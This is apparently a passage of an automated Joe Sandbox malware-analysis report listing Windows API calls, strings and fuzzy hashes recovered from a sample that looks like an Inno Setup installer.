                                                                                  • CloseHandle.KERNEL32(00000000,00478A73,00000000,00000000,000000FF,000000FF,00000000,00478A6C,?,00000000,00478A8E,?,?,?,?), ref: 00478A66
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                                  • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                  • API String ID: 883996979-221126205
                                                                                  • Opcode ID: b28b376a2be0868b0724ee08b6bb697a07dc67947066f4536c6a368308ef9766
                                                                                  • Instruction ID: 790ad9f0fbfe83bf1512199edb7142052ce1d465f1a82f053b14324264bcdb90
                                                                                  • Opcode Fuzzy Hash: b28b376a2be0868b0724ee08b6bb697a07dc67947066f4536c6a368308ef9766
                                                                                  • Instruction Fuzzy Hash: 0C3124B0A40209AEDB10EFA6C845ADEB7A8EB04318F50853FF518E7282DF7C59458B1D
                                                                                  APIs
                                                                                  • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 00422A04
                                                                                  • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BCE), ref: 00422A14
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSendShowWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1631623395-0
                                                                                  • Opcode ID: ad20764d00b4e1bce030a3e3c27d486f6ceec107be95deacbd1ab04939794df1
                                                                                  • Instruction ID: 28b3b238c6a175230bfdc04dc608b83412cf05ad4dc18caa3e002023b447773b
                                                                                  • Opcode Fuzzy Hash: ad20764d00b4e1bce030a3e3c27d486f6ceec107be95deacbd1ab04939794df1
                                                                                  • Instruction Fuzzy Hash: 5D915171B04214BFDB11EFA9DA86F9D77F4AB04314F5500B6F504AB3A2CB78AE409B58
                                                                                  APIs
                                                                                  • IsIconic.USER32(?), ref: 004183A3
                                                                                  • GetWindowPlacement.USER32(?,0000002C), ref: 004183C0
                                                                                  • GetWindowRect.USER32(?), ref: 004183DC
                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 004183EA
                                                                                  • GetWindowLongA.USER32(?,000000F8), ref: 004183FF
                                                                                  • ScreenToClient.USER32(00000000), ref: 00418408
                                                                                  • ScreenToClient.USER32(00000000,?), ref: 00418413
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                  • String ID: ,
                                                                                  • API String ID: 2266315723-3772416878
                                                                                  • Opcode ID: e1e10888711d407f8fe90eb8876dbc7d811cb5afcf9edaa6a068330facd90bcc
                                                                                  • Instruction ID: 83451382f6561a1cdaf4068601f89ac1c3a417dc2c2f98083d52f4ec56b04d21
                                                                                  • Opcode Fuzzy Hash: e1e10888711d407f8fe90eb8876dbc7d811cb5afcf9edaa6a068330facd90bcc
                                                                                  • Instruction Fuzzy Hash: 10112871505201ABDB00EF69C885F9B77E8AF48314F180A7EBD58DB286D738D900CB6A
                                                                                  APIs
                                                                                  • IsIconic.USER32(?), ref: 0042F318
                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 0042F32C
                                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 0042F343
                                                                                  • GetActiveWindow.USER32 ref: 0042F34C
                                                                                  • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F379
                                                                                  • SetActiveWindow.USER32(?,0042F4A9,00000000,?), ref: 0042F39A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ActiveLong$IconicMessage
                                                                                  • String ID:
                                                                                  • API String ID: 1633107849-0
                                                                                  • Opcode ID: e8f6b6a421ea1d3179e4c98d77dd5a9a956952bb32a08c7b31a1e4991f2154d2
                                                                                  • Instruction ID: 64d3bd35cbe97a20ddf06b1c5bb431ac215ab6611dc304e3324dca4d9728f060
                                                                                  • Opcode Fuzzy Hash: e8f6b6a421ea1d3179e4c98d77dd5a9a956952bb32a08c7b31a1e4991f2154d2
                                                                                  • Instruction Fuzzy Hash: 0E319C71A00254AFDB01EFB6DC52D6FBBB8EB0D714B9144BAB800E7291D6389D10CB68
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(00000028), ref: 0045569B
                                                                                  • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004556A1
                                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004556BA
                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 004556E1
                                                                                  • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004556E6
                                                                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 004556F7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                  • String ID: SeShutdownPrivilege
                                                                                  • API String ID: 107509674-3733053543
                                                                                  • Opcode ID: 6f0918c0c13bc2f4d4c54a185237749107d323edec97579a5aa57cfa3c3a92f6
                                                                                  • Instruction ID: c3cc1ea1cd3915d7a33d422d8d95032da4a52c1e989dd5dcf2427ab637b102ec
                                                                                  • Opcode Fuzzy Hash: 6f0918c0c13bc2f4d4c54a185237749107d323edec97579a5aa57cfa3c3a92f6
                                                                                  • Instruction Fuzzy Hash: F8F06870694B42B9E610A6B1CC17F3B21C89B44749F50482AFD05EA1D3D7FCD9084A7E
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045D239
                                                                                  • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045D249
                                                                                  • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045D259
                                                                                  • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047FDF3,00000000,0047FE1C), ref: 0045D27E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$CryptVersion
                                                                                  • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                                  • API String ID: 1951258720-508647305
                                                                                  • Opcode ID: e7d405a4ff4eebbc0640f86d2c220ba04bd3b21cd5ce18d39a7322497cc2147d
                                                                                  • Instruction ID: 61c9e43cd1f728e0e46d113f0b501511b53ff9056e95746757012e10b94b60ba
                                                                                  • Opcode Fuzzy Hash: e7d405a4ff4eebbc0640f86d2c220ba04bd3b21cd5ce18d39a7322497cc2147d
                                                                                  • Instruction Fuzzy Hash: 9EF01DF1D01700DAD314DF76AD457263796EBA831AF08807BB800D61A2D779884ADE1C
                                                                                  APIs
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,004988BA,?,?,00000000,0049C628,?,00498A44,00000000,00498A98,?,?,00000000,0049C628), ref: 004987D3
                                                                                  • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 00498856
                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,00498892,?,00000000,?,00000000,004988BA,?,?,00000000,0049C628,?,00498A44,00000000), ref: 0049886E
                                                                                  • FindClose.KERNEL32(000000FF,00498899,00498892,?,00000000,?,00000000,004988BA,?,?,00000000,0049C628,?,00498A44,00000000,00498A98), ref: 0049888C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFind$AttributesCloseFirstNext
                                                                                  • String ID: isRS-$isRS-???.tmp
                                                                                  • API String ID: 134685335-3422211394
                                                                                  • Opcode ID: 2eac78899decf67a2599575f6ffc01aede9a3e72dfd4e437df88c1528b359898
                                                                                  • Instruction ID: 01fac1220d05b00ddf84770a6e44258796d533cd1c1ae58874983c532305936c
                                                                                  • Opcode Fuzzy Hash: 2eac78899decf67a2599575f6ffc01aede9a3e72dfd4e437df88c1528b359898
                                                                                  • Instruction Fuzzy Hash: 6631587190161C6FDF10EF66CC41ADEBBBCDB46314F5184FBA808A32A1DB389E458E64
                                                                                  APIs
                                                                                  • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004576B9
                                                                                  • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004576E0
                                                                                  • SetForegroundWindow.USER32(?), ref: 004576F1
                                                                                  • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,004579C9,?,00000000,00457A05), ref: 004579B4
                                                                                  Strings
                                                                                  • Cannot evaluate variable because [Code] isn't running yet, xrefs: 00457834
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                                  • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                                  • API String ID: 2236967946-3182603685
                                                                                  • Opcode ID: 77aeb0a8c7fef545e84f15dd7e0a3ea2404ede663b2c5dd9e5d361db2ccce855
                                                                                  • Instruction ID: bbeea18b3a5a77650d3de781f5d15eeacb1b42f9300217bc3a931905813ce4bc
                                                                                  • Opcode Fuzzy Hash: 77aeb0a8c7fef545e84f15dd7e0a3ea2404ede663b2c5dd9e5d361db2ccce855
                                                                                  • Instruction Fuzzy Hash: 64910174608204EFEB15CF65E951F5ABBF5FB4D304F2180BAE80497392C638AE05CB68
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455FF3), ref: 00455EE4
                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455EEA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                  • API String ID: 1646373207-3712701948
                                                                                  • Opcode ID: 6a98d8be3cefb5d1321440a09b2e8a7ab4abd71e514de144cb28141e7088ffe0
                                                                                  • Instruction ID: c7998eed729051dc06c2a4bfb378ba8793a5d3ea0401748e56fe411d955f0a7d
                                                                                  • Opcode Fuzzy Hash: 6a98d8be3cefb5d1321440a09b2e8a7ab4abd71e514de144cb28141e7088ffe0
                                                                                  • Instruction Fuzzy Hash: 6C417471A04659AFCF01EFA5C8929EEB7B8EF48305F504567F800F7292D67C5E098B68
                                                                                  APIs
                                                                                  • IsIconic.USER32(?), ref: 00417D1F
                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
                                                                                  • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                                                  • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Placement$Iconic
                                                                                  • String ID: ,
                                                                                  • API String ID: 568898626-3772416878
                                                                                  • Opcode ID: 3b7cc9104e2877f08458343a95692454dc034f6994d69eb5de7ebf140b23916c
                                                                                  • Instruction ID: 8a2405f126271a8a3f3b67151c5e9cb2aa668bd176c3c9f3f75a3d087e0924cd
                                                                                  • Opcode Fuzzy Hash: 3b7cc9104e2877f08458343a95692454dc034f6994d69eb5de7ebf140b23916c
                                                                                  • Instruction Fuzzy Hash: 90213171604208ABCF00EF69E8C0EEA77B8AF48314F05456AFD18DF346C678DD848B68
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000001,00000000,004643E7), ref: 00464275
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,004643B2,?,00000001,00000000,004643E7), ref: 004642BB
                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,00464394,?,00000000,?,00000000,004643B2,?,00000001,00000000,004643E7), ref: 00464370
                                                                                  • FindClose.KERNEL32(000000FF,0046439B,00464394,?,00000000,?,00000000,004643B2,?,00000001,00000000,004643E7), ref: 0046438E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseErrorFirstModeNext
                                                                                  • String ID:
                                                                                  • API String ID: 4011626565-0
                                                                                  • Opcode ID: c85d62c4d2865e72f60ec0e72557d0bba9d6604f62721e170af8c43ffd28a37e
                                                                                  • Instruction ID: c8116a204d28aaa02fd5c370c7a31de16c8845058ecf0009f09d6eac0a25a6e0
                                                                                  • Opcode Fuzzy Hash: c85d62c4d2865e72f60ec0e72557d0bba9d6604f62721e170af8c43ffd28a37e
                                                                                  • Instruction Fuzzy Hash: 9B415235B00A18DBCB10EF65DC95ADEB7B8EB88305F5045AAF804E7351E7389E848E59
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000001,00000000,00463F41), ref: 00463DB5
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,00463F14,?,00000001,00000000,00463F41), ref: 00463E44
                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,00463EF6,?,00000000,?,00000000,00463F14,?,00000001,00000000,00463F41), ref: 00463ED6
                                                                                  • FindClose.KERNEL32(000000FF,00463EFD,00463EF6,?,00000000,?,00000000,00463F14,?,00000001,00000000,00463F41), ref: 00463EF0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseErrorFirstModeNext
                                                                                  • String ID:
                                                                                  • API String ID: 4011626565-0
                                                                                  • Opcode ID: ac233fd01a22e69a44b0fa54206e939fdb01f3aa8599e3e7019d64004dcc1237
                                                                                  • Instruction ID: 2cce399ef4bcfda7b326651f57ed136ac3b6341b478a121022c65868e2c33bfd
                                                                                  • Opcode Fuzzy Hash: ac233fd01a22e69a44b0fa54206e939fdb01f3aa8599e3e7019d64004dcc1237
                                                                                  • Instruction Fuzzy Hash: E341A730A006589FCB10EF65DC55ADEB7B8EB88305F4044BAF404A7381E77C9F448E59
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452FB3,00000000,00452FD4), ref: 0042E966
                                                                                  • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E991
                                                                                  • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452FB3,00000000,00452FD4), ref: 0042E99E
                                                                                  • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452FB3,00000000,00452FD4), ref: 0042E9A6
                                                                                  • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452FB3,00000000,00452FD4), ref: 0042E9AC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                                  • String ID:
                                                                                  • API String ID: 1177325624-0
                                                                                  • Opcode ID: 70fa8bed737ed64a54ebd93593d3916aa17312c499895c7e057b14e22e01e0f4
                                                                                  • Instruction ID: 200206f6ebf05c62f8aab9c26c76e03d6a480d3026058df5ea69506491fbc91e
                                                                                  • Opcode Fuzzy Hash: 70fa8bed737ed64a54ebd93593d3916aa17312c499895c7e057b14e22e01e0f4
                                                                                  • Instruction Fuzzy Hash: 34F06DB23916203AF620A17A6C86F6F018C8785B68F10423BBA14FF1D1D9A89D0655AD
                                                                                  APIs
                                                                                  • IsIconic.USER32(?), ref: 00483E5E
                                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 00483E7C
                                                                                  • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049D0A8,0048333A,0048336E,00000000,0048338E,?,?,?,0049D0A8), ref: 00483E9E
                                                                                  • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049D0A8,0048333A,0048336E,00000000,0048338E,?,?,?,0049D0A8), ref: 00483EB2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Show$IconicLong
                                                                                  • String ID:
                                                                                  • API String ID: 2754861897-0
                                                                                  • Opcode ID: c386378a0c7f85d1cef37335c2bccc2b04846c6b77b58c4a4d67865339b810c4
                                                                                  • Instruction ID: 4716aa9c85bcb67c2a447f96ffe7cd40772f798c99979f364c9f10fe2fefca1c
                                                                                  • Opcode Fuzzy Hash: c386378a0c7f85d1cef37335c2bccc2b04846c6b77b58c4a4d67865339b810c4
                                                                                  • Instruction Fuzzy Hash: 3C017C70A412416EE710BB29DC8AB6B23C45B14B09F48087BB8449B3A3DB3C9D8AC71C
                                                                                  APIs
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,004628CC), ref: 00462850
                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,004628AC,?,00000000,?,00000000,004628CC), ref: 0046288C
                                                                                  • FindClose.KERNEL32(000000FF,004628B3,004628AC,?,00000000,?,00000000,004628CC), ref: 004628A6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                  • String ID:
                                                                                  • API String ID: 3541575487-0
                                                                                  • Opcode ID: 3afcb13648a0263cf6f8f6bfedae53c76c54b9f835f65621a9b8af134bb0e919
                                                                                  • Instruction ID: 841aaca985aa1eabcc65563c383ac57876b75d473b933154d1e9c72f52fa3cd7
                                                                                  • Opcode Fuzzy Hash: 3afcb13648a0263cf6f8f6bfedae53c76c54b9f835f65621a9b8af134bb0e919
                                                                                  • Instruction Fuzzy Hash: 3A210B31904A087FDB11FF65CD41ADEBBACDB49304F5045B7A808E32A1E67C8E44CE56
                                                                                  APIs
